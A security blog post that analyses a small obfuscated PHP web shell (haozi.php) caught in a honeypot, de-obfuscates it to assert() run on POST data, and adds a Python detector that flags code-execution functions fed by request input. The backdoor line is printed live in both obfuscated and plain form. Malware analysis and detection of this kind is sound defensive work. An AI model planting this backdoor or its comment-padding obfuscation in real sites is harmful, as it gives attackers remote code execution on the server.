Our honeypot has caught another new piece of malware, which is very simple but clever. At first glance it looks like nothing, because the code is padded with many PHP-style comments.
haozi.php
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}[/*-/*-*/0/*-/*-*/]);
If we strip the comments out, the code looks like this:
@$_="s"."s"."e"."r";@$_="a".$_."t";@$_(${"_P"."OS"."T"}[0]);
Finally, if we write this more readably, it is assert() on POST data:
@$_="a"."s"."s"."e"."r"."t";@$_(${"_P"."OS"."T"}[0]);
Final Decoded haozi.php
@assert(${"_POST"}[0]);
The POST payload will be evaluated as PHP code by the assert() function.
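An added example (not Malware Expert's signature or rule code): a small Python normalizer that repeats the comment-stripping and string-joining steps shown above and flags the result when a code-execution function receives request data. The SINKS and INPUTS lists and all function names are assumptions of this example, and statement splitting is deliberately simple.

```python
import re

# Constructed sample input: the obfuscated haozi.php line quoted above.
SAMPLE = r'''@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}[/*-/*-*/0/*-/*-*/]);'''

LEX = re.compile(r'"(?:\\.|[^"\\])*"|\'(?:\\.|[^\'\\])*\'|/\*.*?\*/|//[^\n]*', re.S)
CONCAT = re.compile(r'"([^"\\$]*)"\s*\.\s*"([^"\\$]*)"')
SINKS = {"assert", "eval", "system", "exec", "passthru", "shell_exec"}  # assumed list
INPUTS = r'\$_(?:POST|GET|REQUEST|COOKIE)\b'                            # assumed list

def strip_comments(src):
    """Drop comments but leave string literals untouched."""
    return LEX.sub(lambda m: m.group(0) if m.group(0)[0] in "\"'" else "", src)

def fold(expr):
    """Collapse "a"."b" into "ab" until nothing changes."""
    prev = None
    while prev != expr:
        prev, expr = expr, CONCAT.sub(r'"\1\2"', expr)
    return expr

def normalize(src):
    """Return the statements with constant strings and variables resolved."""
    env, out = {}, []
    # Simplification: statements are split on ';' (no ';' inside literals).
    for stmt in strip_comments(src).split(";"):
        stmt = stmt.strip().lstrip("@")
        if not stmt:
            continue
        m = re.match(r'(\$\w+)\s*=(?!=)\s*(.+)$', stmt, re.S)
        lhs, rhs = (m.group(1), m.group(2)) if m else (None, stmt)
        for var, val in env.items():  # inline string variables seen so far
            rhs = re.sub(re.escape(var) + r'(?!\w)', lambda _m, v=val: '"%s"' % v, rhs)
        rhs = fold(rhs)
        rhs = re.sub(r'\$\{"(\w+)"\}', r'$\1', rhs)   # ${"_POST"} -> $_POST
        rhs = re.sub(r'^"(\w+)"\s*\(', r'\1(', rhs)   # "assert"(  -> assert(
        lit = re.fullmatch(r'"([^"\\$]*)"', rhs)
        if lhs and lit:
            env[lhs] = lit.group(1)
        out.append(f"{lhs}={rhs}" if lhs else rhs)
    return out

def findings(src):
    """Statements where a code-execution sink receives request data."""
    return [s for s in normalize(src)
            if (c := re.match(r'(\w+)\s*\(', s)) and c.group(1).lower() in SINKS
            and re.search(INPUTS, s)]

if __name__ == "__main__":
    print(findings(SAMPLE))
```

On PHP 8.0 and later assert() no longer evaluates string arguments, but a file that normalizes to this pattern is still a backdoor attempt worth flagging.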
Final words
Use Malware Expert – Signatures to detect this malware in files for FREE!
Websites that use Malware Expert – ModSecurity rules are protected against this kind of attack.